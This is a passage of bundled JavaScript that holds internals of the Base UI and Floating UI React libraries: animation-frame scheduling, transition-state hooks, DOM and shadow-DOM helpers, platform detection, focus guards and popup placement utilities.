  var focusOut = "focus-out";
  var escapeKey = "escape-key";
  var closeWatcher = "close-watcher";
  var listNavigation = "list-navigation";
  var keyboard = "keyboard";
  var pointer = "pointer";
  var drag = "drag";
  var wheel = "wheel";
  var scrub = "scrub";
  var cancelOpen = "cancel-open";
  var siblingOpen = "sibling-open";
  var disabled = "disabled";
  var missing = "missing";
  var initial = "initial";
  var imperativeAction = "imperative-action";
  var swipe = "swipe";
  var windowResize = "window-resize";

  // node_modules/@base-ui/react/internals/createBaseUIEventDetails.mjs
  function createChangeEventDetails(reason, event, trigger, customProperties) {
    let canceled = false;
    let allowPropagation = false;
    const custom = customProperties ?? EMPTY_OBJECT;
    const details = {
      reason,
      event: event ?? new Event("base-ui"),
      cancel() {
        canceled = true;
      },
      allowPropagation() {
        allowPropagation = true;
      },
      get isCanceled() {
        return canceled;
      },
      get isPropagationAllowed() {
        return allowPropagation;
      },
      trigger,
      ...custom
    };
    return details;
  }

  // node_modules/@base-ui/react/internals/useTransitionStatus.mjs
  var React10 = __toESM(require_react(), 1);

  // node_modules/@base-ui/utils/useOnMount.mjs
  var React9 = __toESM(require_react(), 1);
  var EMPTY = [];
  function useOnMount(fn) {
    React9.useEffect(fn, EMPTY);
  }

  // node_modules/@base-ui/utils/useAnimationFrame.mjs
  var EMPTY2 = null;
  var LAST_RAF = globalThis.requestAnimationFrame;
  var Scheduler = class {
    /* This implementation uses an array as a backing data-structure for frame callbacks.
     * It allows `O(1)` callback cancelling by inserting a `null` in the array, though it
     * never calls the native `cancelAnimationFrame` if there are no frames left. This can
     * be much more efficient if there is a call pattern that alterns as
     * "request-cancel-request-cancel-…".
     * But in the case of "request-request-…-cancel-cancel-…", it leaves the final animation
     * frame to run anyway. We turn that frame into a `O(1)` no-op via `callbacksCount`. */
    callbacks = [];
    callbacksCount = 0;
    nextId = 1;
    startId = 1;
    isScheduled = false;
    tick = (timestamp) => {
      this.isScheduled = false;
      const currentCallbacks = this.callbacks;
      const currentCallbacksCount = this.callbacksCount;
      this.callbacks = [];
      this.callbacksCount = 0;
      this.startId = this.nextId;
      if (currentCallbacksCount > 0) {
        for (let i = 0; i < currentCallbacks.length; i += 1) {
          currentCallbacks[i]?.(timestamp);
        }
      }
    };
    request(fn) {
      const id = this.nextId;
      this.nextId += 1;
      this.callbacks.push(fn);
      this.callbacksCount += 1;
      const didRAFChange = LAST_RAF !== requestAnimationFrame && (LAST_RAF = requestAnimationFrame, true);
      if (!this.isScheduled || didRAFChange) {
        requestAnimationFrame(this.tick);
        this.isScheduled = true;
      }
      return id;
    }
    cancel(id) {
      const index2 = id - this.startId;
      if (index2 < 0 || index2 >= this.callbacks.length) {
        return;
      }
      this.callbacks[index2] = null;
      this.callbacksCount -= 1;
    }
  };
  var scheduler = new Scheduler();
  var AnimationFrame = class _AnimationFrame {
    static create() {
      return new _AnimationFrame();
    }
    static request(fn) {
      return scheduler.request(fn);
    }
    static cancel(id) {
      return scheduler.cancel(id);
    }
    currentId = EMPTY2;
    /**
     * Executes `fn` after `delay`, clearing any previously scheduled call.
     */
    request(fn) {
      this.cancel();
      this.currentId = scheduler.request(() => {
        this.currentId = EMPTY2;
        fn();
      });
    }
    cancel = () => {
      if (this.currentId !== EMPTY2) {
        scheduler.cancel(this.currentId);
        this.currentId = EMPTY2;
      }
    };
    disposeEffect = () => {
      return this.cancel;
    };
  };
  function useAnimationFrame() {
    const timeout = useRefWithInit(AnimationFrame.create).current;
    useOnMount(timeout.disposeEffect);
    return timeout;
  }

  // node_modules/@base-ui/react/internals/useTransitionStatus.mjs
  function useTransitionStatus(open, enableIdleState = false, deferEndingState = false) {
    const [transitionStatus, setTransitionStatus] = React10.useState(open && enableIdleState ? "idle" : void 0);
    const [mounted, setMounted] = React10.useState(open);
    if (open && !mounted) {
      setMounted(true);
      setTransitionStatus("starting");
    }
    if (!open && mounted && transitionStatus !== "ending" && !deferEndingState) {
      setTransitionStatus("ending");
    }
    if (!open && !mounted && transitionStatus === "ending") {
      setTransitionStatus(void 0);
    }
    useIsoLayoutEffect(() => {
      if (!open && mounted && transitionStatus !== "ending" && deferEndingState) {
        const frame = AnimationFrame.request(() => {
          setTransitionStatus("ending");
        });
        return () => {
          AnimationFrame.cancel(frame);
        };
      }
      return void 0;
    }, [open, mounted, transitionStatus, deferEndingState]);
    useIsoLayoutEffect(() => {
      if (!open || enableIdleState) {
        return void 0;
      }
      const frame = AnimationFrame.request(() => {
        setTransitionStatus(void 0);
      });
      return () => {
        AnimationFrame.cancel(frame);
      };
    }, [enableIdleState, open]);
    useIsoLayoutEffect(() => {
      if (!open || !enableIdleState) {
        return void 0;
      }
      if (open && mounted && transitionStatus !== "idle") {
        setTransitionStatus("starting");
      }
      const frame = AnimationFrame.request(() => {
        setTransitionStatus("idle");
      });
      return () => {
        AnimationFrame.cancel(frame);
      };
    }, [enableIdleState, open, mounted, transitionStatus]);
    return {
      mounted,
      setMounted,
      transitionStatus
    };
  }

  // node_modules/@base-ui/react/internals/stateAttributesMapping.mjs
  var TransitionStatusDataAttributes = /* @__PURE__ */ (function(TransitionStatusDataAttributes2) {
    TransitionStatusDataAttributes2["startingStyle"] = "data-starting-style";
    TransitionStatusDataAttributes2["endingStyle"] = "data-ending-style";
    return TransitionStatusDataAttributes2;
  })({});
  var STARTING_HOOK = {
    [TransitionStatusDataAttributes.startingStyle]: ""
  };
  var ENDING_HOOK = {
    [TransitionStatusDataAttributes.endingStyle]: ""
  };
  var transitionStatusMapping = {
    transitionStatus(value) {
      if (value === "starting") {
        return STARTING_HOOK;
      }
      if (value === "ending") {
        return ENDING_HOOK;
      }
      return null;
    }
  };

  // node_modules/@floating-ui/utils/dist/floating-ui.utils.dom.mjs
  function hasWindow() {
    return typeof window !== "undefined";
  }
  function getNodeName(node) {
    if (isNode(node)) {
      return (node.nodeName || "").toLowerCase();
    }
    return "#document";
  }
  function getWindow(node) {
    var _node$ownerDocument;
    return (node == null || (_node$ownerDocument = node.ownerDocument) == null ? void 0 : _node$ownerDocument.defaultView) || window;
  }
  function getDocumentElement(node) {
    var _ref;
    return (_ref = (isNode(node) ? node.ownerDocument : node.document) || window.document) == null ? void 0 : _ref.documentElement;
  }
  function isNode(value) {
    if (!hasWindow()) {
      return false;
    }
    return value instanceof Node || value instanceof getWindow(value).Node;
  }
  function isElement(value) {
    if (!hasWindow()) {
      return false;
    }
    return value instanceof Element || value instanceof getWindow(value).Element;
  }
  function isHTMLElement(value) {
    if (!hasWindow()) {
      return false;
    }
    return value instanceof HTMLElement || value instanceof getWindow(value).HTMLElement;
  }
  function isShadowRoot(value) {
    if (!hasWindow() || typeof ShadowRoot === "undefined") {
      return false;
    }
    return value instanceof ShadowRoot || value instanceof getWindow(value).ShadowRoot;
  }
  function isOverflowElement(element) {
    const {
      overflow,
      overflowX,
      overflowY,
      display
    } = getComputedStyle2(element);
    return /auto|scroll|overlay|hidden|clip/.test(overflow + overflowY + overflowX) && display !== "inline" && display !== "contents";
  }
  function isTableElement(element) {
    return /^(table|td|th)$/.test(getNodeName(element));
  }
  function isTopLayer(element) {
    try {
      if (element.matches(":popover-open")) {
        return true;
      }
    } catch (_e) {
    }
    try {
      return element.matches(":modal");
    } catch (_e) {
      return false;
    }
  }
  var willChangeRe = /transform|translate|scale|rotate|perspective|filter/;
  var containRe = /paint|layout|strict|content/;
  var isNotNone = (value) => !!value && value !== "none";
  var isWebKitValue;
  function isContainingBlock(elementOrCss) {
    const css = isElement(elementOrCss) ? getComputedStyle2(elementOrCss) : elementOrCss;
    return isNotNone(css.transform) || isNotNone(css.translate) || isNotNone(css.scale) || isNotNone(css.rotate) || isNotNone(css.perspective) || !isWebKit() && (isNotNone(css.backdropFilter) || isNotNone(css.filter)) || willChangeRe.test(css.willChange || "") || containRe.test(css.contain || "");
  }
  function getContainingBlock(element) {
    let currentNode = getParentNode(element);
    while (isHTMLElement(currentNode) && !isLastTraversableNode(currentNode)) {
      if (isContainingBlock(currentNode)) {
        return currentNode;
      } else if (isTopLayer(currentNode)) {
        return null;
      }
      currentNode = getParentNode(currentNode);
    }
    return null;
  }
  function isWebKit() {
    if (isWebKitValue == null) {
      isWebKitValue = typeof CSS !== "undefined" && CSS.supports && CSS.supports("-webkit-backdrop-filter", "none");
    }
    return isWebKitValue;
  }
  function isLastTraversableNode(node) {
    return /^(html|body|#document)$/.test(getNodeName(node));
  }
  function getComputedStyle2(element) {
    return getWindow(element).getComputedStyle(element);
  }
  function getNodeScroll(element) {
    if (isElement(element)) {
      return {
        scrollLeft: element.scrollLeft,
        scrollTop: element.scrollTop
      };
    }
    return {
      scrollLeft: element.scrollX,
      scrollTop: element.scrollY
    };
  }
  function getParentNode(node) {
    if (getNodeName(node) === "html") {
      return node;
    }
    const result = (
      // Step into the shadow DOM of the parent of a slotted node.
      node.assignedSlot || // DOM Element detected.
      node.parentNode || // ShadowRoot detected.
      isShadowRoot(node) && node.host || // Fallback.
      getDocumentElement(node)
    );
    return isShadowRoot(result) ? result.host : result;
  }
  function getNearestOverflowAncestor(node) {
    const parentNode = getParentNode(node);
    if (isLastTraversableNode(parentNode)) {
      return node.ownerDocument ? node.ownerDocument.body : node.body;
    }
    if (isHTMLElement(parentNode) && isOverflowElement(parentNode)) {
      return parentNode;
    }
    return getNearestOverflowAncestor(parentNode);
  }
  function getOverflowAncestors(node, list, traverseIframes) {
    var _node$ownerDocument2;
    if (list === void 0) {
      list = [];
    }
    if (traverseIframes === void 0) {
      traverseIframes = true;
    }
    const scrollableAncestor = getNearestOverflowAncestor(node);
    const isBody = scrollableAncestor === ((_node$ownerDocument2 = node.ownerDocument) == null ? void 0 : _node$ownerDocument2.body);
    const win = getWindow(scrollableAncestor);
    if (isBody) {
      const frameElement = getFrameElement(win);
      return list.concat(win, win.visualViewport || [], isOverflowElement(scrollableAncestor) ? scrollableAncestor : [], frameElement && traverseIframes ? getOverflowAncestors(frameElement) : []);
    } else {
      return list.concat(scrollableAncestor, getOverflowAncestors(scrollableAncestor, [], traverseIframes));
    }
  }
  function getFrameElement(win) {
    return win.parent && Object.getPrototypeOf(win.parent) ? win.frameElement : null;
  }

  // node_modules/@base-ui/utils/addEventListener.mjs
  function addEventListener(target, type, listener, options) {
    target.addEventListener(type, listener, options);
    return () => {
      target.removeEventListener(type, listener, options);
    };
  }

  // node_modules/@base-ui/utils/useValueAsRef.mjs
  function useValueAsRef(value) {
    const latest = useRefWithInit(createLatestRef, value).current;
    latest.next = value;
    useIsoLayoutEffect(latest.effect);
    return latest;
  }
  function createLatestRef(value) {
    const latest = {
      current: value,
      next: value,
      effect: () => {
        latest.current = latest.next;
      }
    };
    return latest;
  }

  // node_modules/@base-ui/utils/owner.mjs
  function ownerDocument(node) {
    return node?.ownerDocument || document;
  }

  // node_modules/@base-ui/react/internals/useOpenChangeComplete.mjs
  var React11 = __toESM(require_react(), 1);

  // node_modules/@base-ui/react/internals/useAnimationsFinished.mjs
  var ReactDOM = __toESM(require_react_dom(), 1);

  // node_modules/@base-ui/react/utils/resolveRef.mjs
  function resolveRef(maybeRef) {
    if (maybeRef == null) {
      return maybeRef;
    }
    return "current" in maybeRef ? maybeRef.current : maybeRef;
  }

  // node_modules/@base-ui/react/internals/useAnimationsFinished.mjs
  function useAnimationsFinished(elementOrRef, waitForStartingStyleRemoved = false, treatAbortedAsFinished = true) {
    const frame = useAnimationFrame();
    return useStableCallback((fnToExecute, signal = null) => {
      frame.cancel();
      const element = resolveRef(elementOrRef);
      if (element == null) {
        return;
      }
      const resolvedElement = element;
      const done = () => {
        ReactDOM.flushSync(fnToExecute);
      };
      if (typeof resolvedElement.getAnimations !== "function" || globalThis.BASE_UI_ANIMATIONS_DISABLED) {
        fnToExecute();
        return;
      }
      function exec() {
        Promise.all(resolvedElement.getAnimations().map((animation) => animation.finished)).then(() => {
          if (!signal?.aborted) {
            done();
          }
        }).catch(() => {
          if (treatAbortedAsFinished) {
            if (!signal?.aborted) {
              done();
            }
            return;
          }
          const currentAnimations = resolvedElement.getAnimations();
          if (!signal?.aborted && currentAnimations.length > 0 && currentAnimations.some((animation) => animation.pending || animation.playState !== "finished")) {
            exec();
          }
        });
      }
      if (waitForStartingStyleRemoved) {
        const startingStyleAttribute = TransitionStatusDataAttributes.startingStyle;
        if (!resolvedElement.hasAttribute(startingStyleAttribute)) {
          frame.request(exec);
          return;
        }
        const attributeObserver = new MutationObserver(() => {
          if (!resolvedElement.hasAttribute(startingStyleAttribute)) {
            attributeObserver.disconnect();
            exec();
          }
        });
        attributeObserver.observe(resolvedElement, {
          attributes: true,
          attributeFilter: [startingStyleAttribute]
        });
        signal?.addEventListener("abort", () => attributeObserver.disconnect(), {
          once: true
        });
        return;
      }
      frame.request(exec);
    });
  }

  // node_modules/@base-ui/react/internals/useOpenChangeComplete.mjs
  function useOpenChangeComplete(parameters) {
    const {
      enabled = true,
      open,
      ref,
      onComplete: onCompleteParam
    } = parameters;
    const onComplete = useStableCallback(onCompleteParam);
    const runOnceAnimationsFinish = useAnimationsFinished(ref, open, false);
    React11.useEffect(() => {
      if (!enabled) {
        return void 0;
      }
      const abortController = new AbortController();
      runOnceAnimationsFinish(onComplete, abortController.signal);
      return () => {
        abortController.abort();
      };
    }, [enabled, open, onComplete, runOnceAnimationsFinish]);
  }

  // node_modules/@base-ui/utils/useOnFirstRender.mjs
  var React12 = __toESM(require_react(), 1);
  function useOnFirstRender(fn) {
    const ref = React12.useRef(true);
    if (ref.current) {
      ref.current = false;
      fn();
    }
  }

  // node_modules/@base-ui/utils/platform/parts.mjs
  var parts_exports = {};
  __export(parts_exports, {
    engine: () => engine_exports,
    env: () => env_exports,
    os: () => os_exports,
    screenReader: () => screen_reader_exports
  });

  // node_modules/@base-ui/utils/platform/os.mjs
  var os_exports = {};
  __export(os_exports, {
    android: () => android,
    apple: () => apple,
    ios: () => ios,
    linux: () => linux,
    mac: () => mac,
    windows: () => windows
  });

  // node_modules/@base-ui/utils/platform/shared.mjs
  function readRawData() {
    if (typeof navigator === "undefined") {
      return {
        userAgent: "",
        platform: "",
        maxTouchPoints: 0
      };
    }
    if (true) {
      const uaData = navigator.userAgentData;
      if (uaData && Array.isArray(uaData.brands)) {
        return {
          userAgent: uaData.brands.map(({
            brand,
            version: version2
          }) => `${brand}/${version2}`).join(" "),
          platform: uaData.platform ?? navigator.platform ?? "",
          maxTouchPoints: navigator.maxTouchPoints ?? 0
        };
      }
    }
    return {
      userAgent: navigator.userAgent,
      platform: navigator.platform ?? "",
      maxTouchPoints: navigator.maxTouchPoints ?? 0
    };
  }
  var {
    userAgent,
    platform,
    maxTouchPoints
  } = readRawData();
  var lowerUserAgent = userAgent.toLowerCase();
  var lowerPlatform = platform.toLowerCase();

  // node_modules/@base-ui/utils/platform/os.mjs
  var ios = /^i(os$|p)/.test(lowerPlatform) || lowerPlatform === "macintel" && maxTouchPoints > 1;
  var ANDROID_STRING = "android";
  var android = lowerPlatform === ANDROID_STRING || lowerUserAgent.includes(ANDROID_STRING);
  var mac = !ios && lowerPlatform.startsWith("mac");
  var windows = lowerPlatform.startsWith("win");
  var linux = !android && /^(linux|chrome os)/.test(lowerPlatform);
  var apple = mac || ios;

  // node_modules/@base-ui/utils/platform/engine.mjs
  var engine_exports = {};
  __export(engine_exports, {
    blink: () => blink,
    gecko: () => gecko,
    webkit: () => webkit
  });
  var webkit = typeof CSS !== "undefined" && !!CSS.supports?.("-webkit-backdrop-filter:none");
  var gecko = !webkit && lowerUserAgent.includes("firefox");
  var blink = !webkit && lowerUserAgent.includes("chrom");

  // node_modules/@base-ui/utils/platform/screen-reader.mjs
  var screen_reader_exports = {};
  __export(screen_reader_exports, {
    voiceOver: () => voiceOver
  });
  var voiceOver = apple;

  // node_modules/@base-ui/utils/platform/env.mjs
  var env_exports = {};
  __export(env_exports, {
    jsdom: () => jsdom
  });
  var jsdom = /jsdom|happydom/.test(lowerUserAgent);

  // node_modules/@base-ui/utils/useTimeout.mjs
  var EMPTY3 = 0;
  var Timeout = class _Timeout {
    static create() {
      return new _Timeout();
    }
    currentId = EMPTY3;
    /**
     * Executes `fn` after `delay`, clearing any previously scheduled call.
     */
    start(delay, fn) {
      this.clear();
      this.currentId = setTimeout(() => {
        this.currentId = EMPTY3;
        fn();
      }, delay);
    }
    isStarted() {
      return this.currentId !== EMPTY3;
    }
    clear = () => {
      if (this.currentId !== EMPTY3) {
        clearTimeout(this.currentId);
        this.currentId = EMPTY3;
      }
    };
    disposeEffect = () => {
      return this.clear;
    };
  };
  function useTimeout() {
    const timeout = useRefWithInit(Timeout.create).current;
    useOnMount(timeout.disposeEffect);
    return timeout;
  }

  // node_modules/@base-ui/react/floating-ui-react/components/FloatingDelayGroup.mjs
  var React13 = __toESM(require_react(), 1);

  // node_modules/@base-ui/react/floating-ui-react/utils/event.mjs
  function isReactEvent(event) {
    return "nativeEvent" in event;
  }
  function isMouseLikePointerType(pointerType, strict) {
    const values = ["mouse", "pen"];
    if (!strict) {
      values.push("", void 0);
    }
    return values.includes(pointerType);
  }
  function isClickLikeEvent(event) {
    const type = event.type;
    return type === "click" || type === "mousedown" || type === "keydown" || type === "keyup";
  }

  // node_modules/@base-ui/react/floating-ui-react/utils/constants.mjs
  var FOCUSABLE_ATTRIBUTE = "data-base-ui-focusable";
  var TYPEABLE_SELECTOR = "input:not([type='hidden']):not([disabled]),[contenteditable]:not([contenteditable='false']),textarea:not([disabled])";

  // node_modules/@base-ui/react/internals/shadowDom.mjs
  function activeElement(doc) {
    let element = doc.activeElement;
    while (element?.shadowRoot?.activeElement != null) {
      element = element.shadowRoot.activeElement;
    }
    return element;
  }
  function contains(parent, child) {
    if (!parent || !child) {
      return false;
    }
    const rootNode = child.getRootNode?.();
    if (parent.contains(child)) {
      return true;
    }
    if (rootNode && isShadowRoot(rootNode)) {
      let next = child;
      while (next) {
        if (parent === next) {
          return true;
        }
        next = next.parentNode || next.host;
      }
    }
    return false;
  }
  function getTarget(event) {
    if ("composedPath" in event) {
      return event.composedPath()[0];
    }
    return event.target;
  }

  // node_modules/@base-ui/react/floating-ui-react/utils/element.mjs
  function isTargetInsideEnabledTrigger(target, triggerElements) {
    if (!isElement(target)) {
      return false;
    }
    const targetElement = target;
    if (triggerElements.hasElement(targetElement)) {
      return !targetElement.hasAttribute("data-trigger-disabled");
    }
    for (const [, trigger] of triggerElements.entries()) {
      if (contains(trigger, targetElement)) {
        return !trigger.hasAttribute("data-trigger-disabled");
      }
    }
    return false;
  }
  function isEventTargetWithin(event, node) {
    if (node == null) {
      return false;
    }
    if ("composedPath" in event) {
      return event.composedPath().includes(node);
    }
    const eventAgain = event;
    return eventAgain.target != null && node.contains(eventAgain.target);
  }
  function isRootElement(element) {
    return element.matches("html,body");
  }
  function isTypeableElement(element) {
    return isHTMLElement(element) && element.matches(TYPEABLE_SELECTOR);
  }
  function isInteractiveElement(element) {
    return element?.closest(`button,a[href],[role="button"],select,[tabindex]:not([tabindex="-1"]),${TYPEABLE_SELECTOR}`) != null;
  }
  function matchesFocusVisible(element) {
    if (!element || parts_exports.env.jsdom) {
      return true;
    }
    try {
      return element.matches(":focus-visible");
    } catch (_e) {
      return true;
    }
  }

  // node_modules/@base-ui/react/floating-ui-react/hooks/useHoverShared.mjs
  function resolveValue(value, pointerType) {
    if (pointerType != null && !isMouseLikePointerType(pointerType)) {
      return 0;
    }
    if (typeof value === "function") {
      return value();
    }
    return value;
  }
  function getDelay(value, prop, pointerType) {
    const result = resolveValue(value, pointerType);
    if (typeof result === "number") {
      return result;
    }
    return result?.[prop];
  }
  function getRestMs(value) {
    if (typeof value === "function") {
      return value();
    }
    return value;
  }
  function isClickLikeOpenEvent(openEventType, interactedInside) {
    return interactedInside || openEventType === "click" || openEventType === "mousedown";
  }
  function isHoverOpenEvent(openEventType) {
    return openEventType?.includes("mouse") && openEventType !== "mousedown";
  }

  // node_modules/@base-ui/react/floating-ui-react/components/FloatingDelayGroup.mjs
  var import_jsx_runtime = __toESM(require_jsx_runtime(), 1);
  var FloatingDelayGroupContext = /* @__PURE__ */ React13.createContext({
    hasProvider: false,
    timeoutMs: 0,
    delayRef: {
      current: 0
    },
    initialDelayRef: {
      current: 0
    },
    timeout: new Timeout(),
    currentIdRef: {
      current: null
    },
    currentContextRef: {
      current: null
    }
  });
  if (true) FloatingDelayGroupContext.displayName = "FloatingDelayGroupContext";
  function resetDelayRef(delayRef, initialDelayRef) {
    delayRef.current = initialDelayRef.current;
  }
  function FloatingDelayGroup(props) {
    const {
      children,
      delay,
      timeoutMs = 0
    } = props;
    const delayRef = React13.useRef(delay);
    const initialDelayRef = React13.useRef(delay);
    const currentIdRef = React13.useRef(null);
    const currentContextRef = React13.useRef(null);
    const timeout = useTimeout();
    useIsoLayoutEffect(() => {
      initialDelayRef.current = delay;
      if (!currentIdRef.current) {
        delayRef.current = delay;
        return;
      }
      delayRef.current = {
        open: getDelay(delayRef.current, "open"),
        close: getDelay(delay, "close")
      };
    }, [delay, currentIdRef, delayRef, initialDelayRef]);
    return /* @__PURE__ */ (0, import_jsx_runtime.jsx)(FloatingDelayGroupContext.Provider, {
      value: React13.useMemo(() => ({
        hasProvider: true,
        delayRef,
        initialDelayRef,
        currentIdRef,
        timeoutMs,
        currentContextRef,
        timeout
      }), [timeoutMs, timeout]),
      children
    });
  }
  function useDelayGroup(context, options = {
    open: false
  }) {
    const {
      open
    } = options;
    const store2 = "rootStore" in context ? context.rootStore : context;
    const floatingId = store2.useState("floatingId");
    const groupContext = React13.useContext(FloatingDelayGroupContext);
    const {
      currentIdRef,
      delayRef,
      timeoutMs,
      initialDelayRef,
      currentContextRef,
      hasProvider,
      timeout
    } = groupContext;
    const [isInstantPhase, setIsInstantPhase] = React13.useState(false);
    const openRef = React13.useRef(open);
    const isUnmountedRef = React13.useRef(false);
    useIsoLayoutEffect(() => {
      openRef.current = open;
    }, [open]);
    useIsoLayoutEffect(() => {
      return () => {
        isUnmountedRef.current = true;
      };
    }, []);
    useIsoLayoutEffect(() => {
      function unset() {
        if (!isUnmountedRef.current) {
          setIsInstantPhase(false);
        }
        currentContextRef.current?.setIsInstantPhase(false);
        currentIdRef.current = null;
        currentContextRef.current = null;
        delayRef.current = initialDelayRef.current;
        timeout.clear();
      }
      if (!currentIdRef.current) {
        return void 0;
      }
      if (!open && currentIdRef.current === floatingId) {
        setIsInstantPhase(false);
        if (timeoutMs) {
          const closingId = floatingId;
          timeout.start(timeoutMs, () => {
            if (store2.select("open") || currentIdRef.current && currentIdRef.current !== closingId) {
              return;
            }
            unset();
          });
          return () => {
            if (openRef.current || currentIdRef.current !== closingId) {
              timeout.clear();
            }
          };
        }
        unset();
      }
      return void 0;
    }, [open, floatingId, currentIdRef, delayRef, timeoutMs, initialDelayRef, currentContextRef, timeout, store2]);
    useIsoLayoutEffect(() => {
      if (!open) {
        return;
      }
      const prevContext = currentContextRef.current;
      const prevId = currentIdRef.current;
      timeout.clear();
      currentContextRef.current = {
        onOpenChange: store2.setOpen,
        setIsInstantPhase
      };
      currentIdRef.current = floatingId;
      delayRef.current = {
        open: 0,
        close: getDelay(initialDelayRef.current, "close")
      };
      if (prevId !== null && prevId !== floatingId) {
        setIsInstantPhase(true);
        prevContext?.setIsInstantPhase(true);
        prevContext?.onOpenChange(false, createChangeEventDetails(reason_parts_exports.none));
      } else {
        setIsInstantPhase(false);
        prevContext?.setIsInstantPhase(false);
      }
    }, [open, floatingId, store2, currentIdRef, delayRef, initialDelayRef, currentContextRef, timeout]);
    useIsoLayoutEffect(() => {
      return () => {
        if (currentIdRef.current === floatingId) {
          currentContextRef.current = null;
          if (!openRef.current) {
            return;
          }
          currentIdRef.current = null;
          resetDelayRef(delayRef, initialDelayRef);
          timeout.clear();
        }
      };
    }, [currentContextRef, currentIdRef, delayRef, floatingId, initialDelayRef, timeout]);
    return React13.useMemo(() => ({
      hasProvider,
      delayRef,
      isInstantPhase
    }), [hasProvider, delayRef, isInstantPhase]);
  }

  // node_modules/@base-ui/utils/mergeCleanups.mjs
  function mergeCleanups(...cleanups) {
    return () => {
      for (let i = 0; i < cleanups.length; i += 1) {
        const cleanup = cleanups[i];
        if (cleanup) {
          cleanup();
        }
      }
    };
  }

  // node_modules/@base-ui/react/utils/FocusGuard.mjs
  var React14 = __toESM(require_react(), 1);

  // node_modules/@base-ui/utils/visuallyHidden.mjs
  var visuallyHiddenBase = {
    clipPath: "inset(50%)",
    overflow: "hidden",
    whiteSpace: "nowrap",
    border: 0,
    padding: 0,
    width: 1,
    height: 1,
    margin: -1
  };
  var visuallyHidden = {
    ...visuallyHiddenBase,
    position: "fixed",
    top: 0,
    left: 0
  };
  var visuallyHiddenInput = {
    ...visuallyHiddenBase,
    position: "absolute"
  };

  // node_modules/@base-ui/react/utils/FocusGuard.mjs
  var import_jsx_runtime2 = __toESM(require_jsx_runtime(), 1);
  var FocusGuard = /* @__PURE__ */ React14.forwardRef(function FocusGuard2(props, ref) {
    const [role, setRole] = React14.useState();
    useIsoLayoutEffect(() => {
      if (parts_exports.screenReader.voiceOver && parts_exports.engine.webkit) {
        setRole("button");
      }
    }, []);
    const restProps = {
      tabIndex: 0,
      // Role is only for VoiceOver
      role
    };
    return /* @__PURE__ */ (0, import_jsx_runtime2.jsx)("span", {
      ...props,
      ref,
      style: visuallyHidden,
      "aria-hidden": role ? void 0 : true,
      ...restProps,
      "data-base-ui-focus-guard": ""
    });
  });
  if (true) FocusGuard.displayName = "FocusGuard";

  // node_modules/@floating-ui/utils/dist/floating-ui.utils.mjs
  var sides = ["top", "right", "bottom", "left"];
  var min = Math.min;
  var max = Math.max;
  var round = Math.round;
  var floor = Math.floor;
  var createCoords = (v) => ({
    x: v,
    y: v
  });
  var oppositeSideMap = {
    left: "right",
    right: "left",
    bottom: "top",
    top: "bottom"
  };
  function clamp(start, value, end) {
    return max(start, min(value, end));
  }
  function evaluate(value, param) {
    return typeof value === "function" ? value(param) : value;
  }
  function getSide(placement) {
    return placement.split("-")[0];
  }
  function getAlignment(placement) {
    return placement.split("-")[1];
  }
  function getOppositeAxis(axis) {
    return axis === "x" ? "y" : "x";
  }
  function getAxisLength(axis) {
    return axis === "y" ? "height" : "width";
  }
  function getSideAxis(placement) {
    const firstChar = placement[0];
    return firstChar === "t" || firstChar === "b" ? "y" : "x";
  }
  function getAlignmentAxis(placement) {
    return getOppositeAxis(getSideAxis(placement));
  }
  function getAlignmentSides(placement, rects, rtl) {
    if (rtl === void 0) {
      rtl = false;
    }
    const alignment = getAlignment(placement);
    const alignmentAxis = getAlignmentAxis(placement);
    const length = getAxisLength(alignmentAxis);
    let mainAlignmentSide = alignmentAxis === "x" ? alignment === (rtl ? "end" : "start") ? "right" : "left" : alignment === "start" ? "bottom" : "top";
    if (rects.reference[length] > rects.floating[length]) {
      mainAlignmentSide = getOppositePlacement(mainAlignmentSide);
    }
    return [mainAlignmentSide, getOppositePlacement(mainAlignmentSide)];
  }
  function getExpandedPlacements(placement) {
    const oppositePlacement = getOppositePlacement(placement);
    return [getOppositeAlignmentPlacement(placement), oppositePlacement, getOppositeAlignmentPlacement(oppositePlacement)];
  }
  function getOppositeAlignmentPlacement(placement) {
    return placement.includes("start") ? placement.replace("start", "end") : placement.replace("end", "start");
  }
  var lrPlacement = ["left", "right"];
  var rlPlacement = ["right", "left"];
  var tbPlacement = ["top", "bottom"];
  var btPlacement = ["bottom", "top"];
  function getSideList(side, isStart, rtl) {
    switch (side) {
      case "top":
      case "bottom":
        if (rtl) return isStart ? rlPlacement : lrPlacement;
        return isStart ? lrPlacement : rlPlacement;
      case "left":
      case "right":
        return isStart ? tbPlacement : btPlacement;
      default:
        return [];
    }
  }
  function getOppositeAxisPlacements(placement, flipAlignment, direction, rtl) {
    const alignment = getAlignment(placement);
    let list = getSideList(getSide(placement), direction === "start", rtl);
    if (alignment) {
      list = list.map((side) => side + "-" + alignment);
      if (flipAlignment) {
        list = list.concat(list.map(getOppositeAlignmentPlacement));
      }
    }
    return list;
  }
  function getOppositePlacement(placement) {
    const side = getSide(placement);
    return oppositeSideMap[side] + placement.slice(side.length);
  }
  function expandPaddingObject(padding) {
    return {
      top: 0,
      right: 0,
      bottom: 0,
      left: 0,
      ...padding
    };
  }
  function getPaddingObject(padding) {
    return typeof padding !== "number" ? expandPaddingObject(padding) : {
      top: padding,
      right: padding,
      bottom: padding,
      left: padding
    };
  }
  function rectToClientRect(rect) {
    const {
      x,
      y,
      width,
      height
    } = rect;
    return {
      width,
      height,
      top: y,
      left: x,
      right: x + width,
      bottom: y + height,
      x,
      y
    };
  }

  // node_modules/@base-ui/react/floating-ui-react/utils/composite.mjs
  function isHiddenByStyles(styles) {
    return styles.visibility === "hidden" || styles.visibility === "collapse";
  }
  function isElementVisible(element, styles = element ? getComputedStyle2(element) : null) {
    if (!element || !element.isConnected || !styles || isHiddenByStyles(styles)) {
      return false;
    }
    if (typeof element.checkVisibility === "function") {
      return element.checkVisibility();
    }
    return styles.display !== "none" && styles.display !== "contents";
  }

  // node_modules/@base-ui/react/floating-ui-react/utils/tabbable.mjs
  var CANDIDATE_SELECTOR = 'a[href],button,input,select,textarea,summary,details,iframe,object,embed,[tabindex],[contenteditable]:not([contenteditable="false"]),audio[controls],video[controls]';
  function getParentElement(element) {
    const assignedSlot = element.assignedSlot;
    if (assignedSlot) {
      return assignedSlot;
    }
    if (element.parentElement) {
      return element.parentElement;
    }
    const rootNode = element.getRootNode();
    return isShadowRoot(rootNode) ? rootNode.host : null;
  }
  function getDetailsSummary(details) {
    for (const child of Array.from(details.children)) {
      if (getNodeName(child) === "summary") {
        return child;
      }
    }
    return null;
  }
  function isWithinOpenDetailsSummary(element, details) {
    const summary = getDetailsSummary(details);
